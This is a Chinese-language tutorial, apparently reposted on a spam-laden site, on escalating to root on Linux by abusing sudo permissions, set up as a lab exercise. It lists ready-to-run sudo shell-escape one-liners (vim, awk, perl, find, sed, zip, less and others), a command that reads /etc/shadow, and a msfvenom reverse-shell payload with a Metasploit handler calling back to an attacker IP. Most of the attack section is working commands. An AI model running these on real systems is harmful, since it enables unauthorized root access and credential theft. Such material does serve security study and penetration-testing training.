当前位置: 首页 > news >正文

行政机关单位网站建设要求舆情网站直接打开怎么弄

行政机关单位网站建设要求,舆情网站直接打开怎么弄,wordpress360插件,java做网站步骤系列文章 操作系统权限提升(十八)之Linux提权-内核提权 操作系统权限提升(十九)之Linux提权-SUID提权 操作系统权限提升(二十)之Linux提权-计划任务提权 操作系统权限提升(二十一)之Linux提权-环境变量劫持提权 SUDO滥用提权 SUDO滥用提权原理 sudo是linux系统管理指令&…

系列文章

操作系统权限提升(十八)之Linux提权-内核提权
操作系统权限提升(十九)之Linux提权-SUID提权
操作系统权限提升(二十)之Linux提权-计划任务提权
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权

SUDO滥用提权

SUDO滥用提权原理

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如reboot,su等等。这样不仅减少了root用户的登录和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。在一些应用场景里面,为了方便运维人员以低权限帐号进行运维,往往会开启帐号的一些SUDO权限给运维帐号,而SUDO权限的授予在/etc/sudoers中进行操作

具体的格式如下

cseroad ALL=(ALL:ALL) NOPASSWD:/usr/bin/apt-get
  • cseroad表示用户名
  • 第一个 ALL 指示允许从任何终端访问sudo
  • 第二个(ALL:ALL)指示sudo命令被允许任意用户、任意组执行
  • 第三个 NOPASSWD 表示不需要输入密码而可以sudo执行的命令

这里要注意了添加的命令一定要写在最后一行

在这里插入图片描述

但是想获取哪些命令设置了无密码sudo,还是需要查看 cat /etc/sudoers 文件或者 sudo -l 命令,而这两条命令都需要一定权限或者知道当前用户密码

在这里插入图片描述
在这里插入图片描述

如果给sudo配置文件配置了ALL 或者以下的命令就可以进行提权

wget、find、cat、apt、zip、xxd、time、taskset、git、sed、pip、ed、tmux、scp、perl、bash、less、awk、man、vi、env、ftp、ed、screen

提权的命令如下

一条命令提权的
sudo vim -c '!sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo xxd "/etc/shadow" | xxd -r
sudo env /bin/sh
sudo perl -e 'exec "/bin/sh";'
sudo zip 2.zip 1.txt -T --unzip-command="sh -c /bin/sh"
sudo sed -n '1e exec sh 1>&0' /etc/passwd
sudo find /etc/passwd -exec /bin/sh \;两条命令提权的
sudo git help config
!/bin/shsudo ftp
!/bin/shsudo less /etc/hosts
!shsudo ed
!/bin/shsudo man man
!/bin/sh

提权准备

使用root用户配置/etc/sudoers配置文件,设置普通用户可以运行任意命令

在这里插入图片描述

提权实战

使用CS或者MSF或者webshell上线机器

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=8888 -f elf > mshell.elfuse exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 8888
run

在这里插入图片描述

使用sudo -l 查看,发现awk可以无密码进行使用

在这里插入图片描述

接下来使用命令进行提权

sudo awk 'BEGIN {system("/bin/sh")}'

在这里插入图片描述

http://www.wangmingla.cn/news/78083.html

相关文章:

  • 做网站编辑好还是推广好sem代运营费用
  • 潍坊网络推广公司长沙seo网络公司
  • php给一个网站做后台做专业搜索引擎优化
  • 长春一般建一个网站需要多少钱站长工具国产
  • 网络推广方案的内容长沙seo技术培训
  • 做赛事预测网站双桥seo排名优化培训
  • 海南黄页电话号码关键词首页排名优化平台
  • 网站内容采编怎么做百度精准推广
  • 网站开发阶段怎么做测试企业seo优化
  • 邵阳整站优化关键词怎么找出来
  • 辽阳网站建设会计培训班哪个机构比较好
  • 网络商城营业执照经营范围长春关键词优化排名
  • 深圳装修公司大全seo优化是做什么的
  • 中小学学校网站建设关键词简谱
  • 如何做 行业社交类网站高质量外链平台
  • 企业网站推广毕业论文答辩甘肃seo技术
  • 云教育科技网站建设怎么推广一个平台
  • 山东建设银行招聘网站国际最新新闻热点事件
  • 网站主机免备案aso优化排名
  • 阿里云服务器上做网站seo搜狗
  • 西安品牌网站建设服务商四年级写一小段新闻
  • 网站建设的经验做法国际新闻最新消息十条摘抄
  • 湖北网站建设的释义网站建设seo
  • 网站虚拟主机租用百度广告联盟下载
  • 宜昌哪有有做网站的百度竞价排名利弊
  • 公司想做个网站应该怎么做世界新闻最新消息
  • 做电影下载网站需要什么软件网站排名首页
  • 建设工程信息哪个网站有详细信息推广网络营销外包公司
  • 做直播网站前端互联网营销师含金量
  • 东莞做网站 9353chatgpt网页